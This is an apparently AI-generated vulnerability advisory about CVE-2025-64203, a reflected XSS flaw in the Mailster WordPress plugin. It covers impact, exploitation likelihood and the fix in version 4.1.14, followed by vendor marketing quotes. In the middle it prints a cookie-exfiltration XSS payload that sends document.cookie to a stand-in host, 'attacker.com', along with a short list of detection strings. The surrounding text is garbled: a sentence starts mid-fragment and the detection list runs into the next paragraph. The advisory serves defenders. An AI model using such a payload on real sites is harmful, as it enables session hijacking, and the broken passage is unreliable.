
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-64203 is a Reflected Cross-Site Scripting (XSS) vulnerability in the EverPress Mailster WordPress plugin, classified under CWE-79. It affects all Mailster versions prior to 4.1.14 and was reported by researcher João Pedro S Alcântara (Kinorth) on September 27, 2025, with public disclosure on October 27, 2025. The CVE was formally published on December 18, 2025. It carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).
The vulnerability is rooted in improper neutralization of user-supplied input during web page generation (CWE-79), specifically a Reflected XSS flaw in the Mailster plugin for WordPress. An unauthenticated attacker can craft a malicious URL containing injected JavaScript that, when clicked by a victim (such as a logged-in administrator), causes the script to execute in the victim's browser within the context of the WordPress site. Exploitation requires no privileges on the target site but does require user interaction — the victim must follow a crafted link. No public proof-of-concept code has been identified at this time (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browser of a victim who interacts with a malicious link, potentially leading to session hijacking, credential theft, unauthorized administrative actions, or redirection to malicious sites. Because the scope is changed (S:C in CVSS), the impact extends beyond the vulnerable component itself, affecting the broader WordPress environment and any data accessible to the victim's session. Confidentiality, integrity, and availability are all assessed as low-impact individually, but the combined effect on a WordPress site — particularly if the victim is an administrator — can be significant (Patchstack).
No confirmed in-the-wild exploitation has been reported for CVE-2025-64203, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low current probability of exploitation. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) injected into the vulnerable parameter.%3Cscript%3E, javascript:, onerror=).The primary remediation is to update the Mailster plugin to version 4.1.14 or later, which contains the fix for this vulnerability. Site administrators who cannot immediately update should consider using a web application firewall (WAF) rule — Patchstack has issued a virtual patch/mitigation rule for subscribers to block exploitation attempts until the plugin is updated. Additionally, educating privileged users to avoid clicking unsolicited or suspicious links reduces the risk of successful exploitation (Patchstack).
The vulnerability was discovered and responsibly disclosed through Patchstack's Active Vulnerability Disclosure Program (VDP) by researcher João Pedro S Alcântara (Kinorth). Patchstack classified it as medium priority and issued a virtual patch for its users. No notable broader media coverage or significant social media discussion has been identified beyond standard vulnerability database listings (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."